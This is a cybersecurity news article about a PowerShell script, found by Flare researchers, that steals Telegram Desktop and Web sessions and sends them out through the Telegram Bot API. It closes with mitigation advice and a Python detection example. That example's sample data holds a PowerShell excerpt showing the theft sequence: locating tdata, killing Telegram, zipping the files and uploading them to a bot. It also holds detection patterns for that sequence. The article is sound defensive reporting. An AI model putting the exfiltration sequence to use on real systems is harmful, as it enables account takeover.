Hackers Exploit Telegram Desktop Vulnerability to Steal User Sessions

Sarah simpson
April 24, 2026

Key Takeaways

  • Cybersecurity researchers have identified a PowerShell script designed to steal Telegram desktop and web sessions.
  • The script, disguised as a “Windows Telemetry Update,” exfiltrates user session data and system metadata.
  • The threat leverages the Telegram Bot API for data exfiltration and shares infrastructure with a web-based session capture tool.
  • The threat is considered high-severity, and immediate mitigation steps are recommended for potentially affected users.

Cybersecurity researchers have uncovered a purpose-built PowerShell script that steals user sessions from both Telegram Desktop and Telegram Web. Disguised as a routine system update, it copies the local session data that lets an attacker act as the victim, and although it shows little technical sophistication, a working version existed at the time of discovery.

The malicious script, deceptively named “Windows Telemetry Update,” is engineered to appear as a legitimate Windows maintenance task. Upon execution, it swiftly gathers host metadata, including the victim’s username, computer name, and public IP address, before proceeding to its primary objective of session theft.

The script specifically targets the Telegram Desktop and Telegram Desktop Beta installation directories under %APPDATA%, looking for the tdata folder, which holds the local account state (including the authorization keys) a Telegram Desktop client needs to act as the logged-in user. It compresses the located session files into a diag.zip archive, temporarily stored in the user’s TEMP folder, before exfiltrating them.

Analysts at Flare discovered this script, hosted on Pastebin, during their continuous monitoring of illicit online channels and paste sites for malicious content. Their investigation revealed a dedicated Telegram session stealer that not only targets desktop session data but also utilizes the Telegram Bot API for exfiltration. Furthermore, it shares infrastructure with a distinct web-based session capture tool.

Researchers note that while the tool’s technical sophistication is minimal, its artifacts provide valuable insights into the development lifecycle of such malicious tools. The analysis uncovered two distinct collection mechanisms at varying stages of development, hardcoded credentials that exposed the operator’s historical activities, and a clear debugging process from an initial, flawed version to a fully functional one.

The script was discovered in two versions on Pastebin, both uploaded by the same account. The initial version (v1) contained a faulty multipart upload implementation, preventing the “diag.zip” archive from reaching the attacker’s bot. The operator subsequently identified and rectified this issue, releasing a corrected version (v2) that properly implemented the sendDocument endpoint using the Invoke-RestMethod -Form approach with correct multipart/form-data encoding. This transparent debugging process, visible through Pastebin’s public post history, offers a rare glimpse into how session-stealing tools are refined before being deployed in active campaigns.

Neither version of the script incorporates obfuscation, persistence, or an automated delivery or execution method. Based on Flare’s assessment, the script appeared to be in an active validation phase at the time of its discovery rather than being used in widespread attacks. However, the presence of a functional v2 variant and a confirmed web-based session stealer sharing the same bot infrastructure suggests that the capability has passed functional validation and could soon transition to large-scale operations.

How the Script Steals Your Telegram Session

The compromise begins when a user manually executes the PowerShell file; nothing drops or launches it automatically. Because the bot token is hardcoded in the script, Flare’s analysts could follow two parallel investigative paths: querying the Telegram Bot API directly to enumerate the bot, and retrieving the bot’s existing message history, which is telemetry from earlier runs, using the Matka tool.

After collecting essential host metadata, the script scans for both stable and beta installations of Telegram Desktop within the %APPDATA% directory. If at least one tdata path is identified, it’s added to a paths array, and the script proceeds. If no Telegram installation is found, it sends a “No Telegram installation found” beacon to the operator, ensuring notification regardless of the outcome.

To ensure successful data extraction, the script forcibly terminates any active Telegram processes, releasing file locks on the tdata directory before initiating compression. A two-second delay is incorporated to allow for complete process termination, a detail indicating the attacker’s awareness of Telegram Desktop’s file-locking behavior. Once the archive is prepared, the api.telegram.org/bot{token}/sendDocument API endpoint is invoked, sending the “diag.zip” file to the operator’s chat ID, accompanied by victim metadata as a caption. Should this method fail, a WebClient UploadFile fallback mechanism ensures the archive still reaches the operator, albeit without the caption. The script concludes by immediately deleting the diag.zip file from disk to minimize forensic traces.

Separately, a web-based stealer component captures the Telegram Web session state held in the browser’s localStorage, specifically the dcX_auth_key entries (MTProto authorization keys, one per data center) and the account1 session structure, and exfiltrates it over the same shared Telegram bot channel. With these keys an attacker can reconstruct an authenticated session without the account password or an SMS code; the same applies to the tdata files taken from the desktop client. Stolen keys keep working until the victim terminates the session they belong to.

What You Should Do

If you suspect this script has compromised your system, immediate action is crucial:

  • Terminate Active Telegram Sessions: In Telegram, open Settings, then Privacy and Security, then Active Sessions (shown as Devices in newer clients), and select “Terminate All Other Sessions.” Do this first: a copied tdata directory or auth key keeps working until the session it belongs to is terminated, and no password change revokes it.
  • Change Telegram Password: Telegram’s only account password is the two-step verification (cloud) password. If you have one set, change it.
  • Enable Two-Factor Authentication (2FA): If not already active, enable two-step verification for your Telegram account. It adds a password check to new logins, so an attacker holding only an SMS code cannot sign in, but it does not revoke sessions that were already stolen.
  • Review Account Activity: Thoroughly review your Telegram account for any unauthorized activity, unusual messages sent from your account, or unexpected changes to account settings.
  • Assess Data Exposure: Consider that any sensitive information previously shared through Telegram may have been exposed. Take appropriate steps to secure related accounts or notify affected parties.
  • Network-Level Blocking: For organizations, block the domains api.telegram.org and web.telegram.org at the proxy and firewall layers in environments where Telegram is not permitted.
  • Monitor API Calls: In environments where Telegram is allowed, monitor for sendDocument and sendMessage calls to api.telegram.org from scripting clients such as PowerShell, Python, or curl, and for requests with no User-Agent header at all (.NET WebClient, which the script’s fallback uses, sends none unless one is set). Seeing the method name requires TLS inspection at the proxy; without it only the host name is visible, so also alert when Telegram Desktop is force-terminated shortly after a PowerShell process starts. Such calls are highly unusual in legitimate enterprise settings and warrant immediate investigation.
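The following detection logic is an added example and not code from the article, from Flare, or from the script’s operator. It implements the two checks this page describes, the “Monitor API Calls” item above and the tdata-plus-Bot-API sequence from the section on how the script works, over constructed sample inputs: the proxy log format, the user-agent strings, the fake bot token and the script-block excerpts are all assumptions.

```python
# Added example, not code from the article or from Flare: detection logic for
# the two signals described above, run over constructed sample logs.
#   1. Egress/proxy log: Bot API sendDocument/sendMessage calls from scripting
#      clients, or with no User-Agent at all (the WebClient fallback case).
#   2. PowerShell script block text (Event ID 4104): a script that both touches
#      a Telegram "tdata" directory and calls api.telegram.org/bot<token>/...
# The log format, user-agent strings, sample lines and bot token are assumptions.
import re
from dataclasses import dataclass
from typing import List, Optional

# Bot tokens are "<numeric bot id>:<35-char secret>"; capture the id, the secret
# and the API method that follows the token in the URL path.
BOT_TOKEN_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]{35})/(\w+)")
EXFIL_METHODS = {"sendDocument", "sendMessage"}
SCRIPT_UA_RE = re.compile(r"PowerShell|python-requests|python-urllib|curl/|Wget/", re.I)
TDATA_RE = re.compile(r"Telegram Desktop( Beta)?\\tdata", re.I)
KILL_RE = re.compile(r"(Stop-Process|taskkill)[^\n]*Telegram", re.I)
BOT_API_RE = re.compile(r"api\.telegram\.org/bot")

FAKE_TOKEN = "123456789:" + "AAH" + "x" * 32  # constructed; not a real token

# Constructed proxy log: "<ts> <client_ip> <http_method> <url> <user_agent>",
# with "-" when the client sent no User-Agent header.
SAMPLE_PROXY_LOG = [
    f"2026-04-24T10:00:01Z 10.0.0.12 POST https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument "
    "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1",
    "2026-04-24T10:00:05Z 10.0.0.13 GET https://web.telegram.org/a/ Mozilla/5.0 (Windows NT 10.0) Chrome/123.0",
    f"2026-04-24T10:00:09Z 10.0.0.14 POST https://api.telegram.org/bot{FAKE_TOKEN}/getMe curl/8.4.0",
    f"2026-04-24T10:00:12Z 10.0.0.12 POST https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument -",
]

# Constructed script block excerpts: one mirroring the sequence the article
# describes, one legitimate bot used to post an ops notification.
SAMPLE_SCRIPT_BLOCKS = {
    "suspicious": (
        '$paths = @("$env:APPDATA\\Telegram Desktop\\tdata", "$env:APPDATA\\Telegram Desktop Beta\\tdata")\n'
        "Stop-Process -Name Telegram -Force; Start-Sleep -Seconds 2\n"
        'Compress-Archive -Path $paths -DestinationPath "$env:TEMP\\diag.zip"\n'
        f'Invoke-RestMethod -Uri "https://api.telegram.org/bot{FAKE_TOKEN}/sendDocument" -Method Post -Form $form\n'
    ),
    "benign": (
        f'Invoke-RestMethod -Uri "https://api.telegram.org/bot{FAKE_TOKEN}/sendMessage" '
        "-Method Post -Body @{chat_id=$ops; text='backup finished'}\n"
    ),
}


@dataclass
class Alert:
    source: str      # "proxy" or "scriptblock"
    reason: str
    bot_id: str      # numeric half of the token; safe to put in a ticket
    api_method: str


def redact(text: str) -> str:
    """Strip the secret half of any bot token before text leaves the SOC."""
    return BOT_TOKEN_RE.sub(lambda m: f"/bot{m.group(1)}:<redacted>/{m.group(3)}", text)


def scan_proxy_line(line: str) -> Optional[Alert]:
    parts = line.split(" ", 4)
    if len(parts) != 5:
        return None
    _ts, client, _verb, url, ua = parts
    if "api.telegram.org" not in url:
        return None
    m = BOT_TOKEN_RE.search(url)
    if m is None or m.group(3) not in EXFIL_METHODS:
        return None  # getMe/getUpdates from a script is odd but is not exfiltration
    if ua == "-" or SCRIPT_UA_RE.search(ua):
        return Alert("proxy", f"{m.group(3)} from {client} via client {ua!r}", m.group(1), m.group(3))
    return None


def scan_script_block(text: str) -> Optional[Alert]:
    """Fire only on the pairing that defines this family: tdata access plus a
    Bot API call. Killing Telegram first is corroborating, not required."""
    if not (TDATA_RE.search(text) and BOT_API_RE.search(text)):
        return None
    m = BOT_TOKEN_RE.search(text)
    detail = "tdata access + Bot API call"
    if KILL_RE.search(text):
        detail += " + Telegram process kill"
    return Alert("scriptblock", detail, m.group(1) if m else "", m.group(3) if m else "")


def run_detection() -> List[Alert]:
    alerts = [a for a in map(scan_proxy_line, SAMPLE_PROXY_LOG) if a]
    alerts += [a for a in map(scan_script_block, SAMPLE_SCRIPT_BLOCKS.values()) if a]
    return alerts


if __name__ == "__main__":
    for a in run_detection():
        print(f"[{a.source}] bot {a.bot_id} {a.api_method}: {redact(a.reason)}")
```

On the sample data this raises three alerts: the PowerShell sendDocument upload, the same upload repeated with no User-Agent (the WebClient fallback), and the script block that pairs tdata access with a Bot API call; the benign ops-notification bot and the getMe probe pass. The proxy check only works where the proxy sees the HTTPS path, which means TLS inspection; with SNI alone you get the host name and should fall back to the process-level signal (Telegram force-terminated after a PowerShell start). Script block logging has to be enabled for the second check to have anything to read, and the bot id is kept while the secret is redacted so the token never ends up in a ticket.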

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.
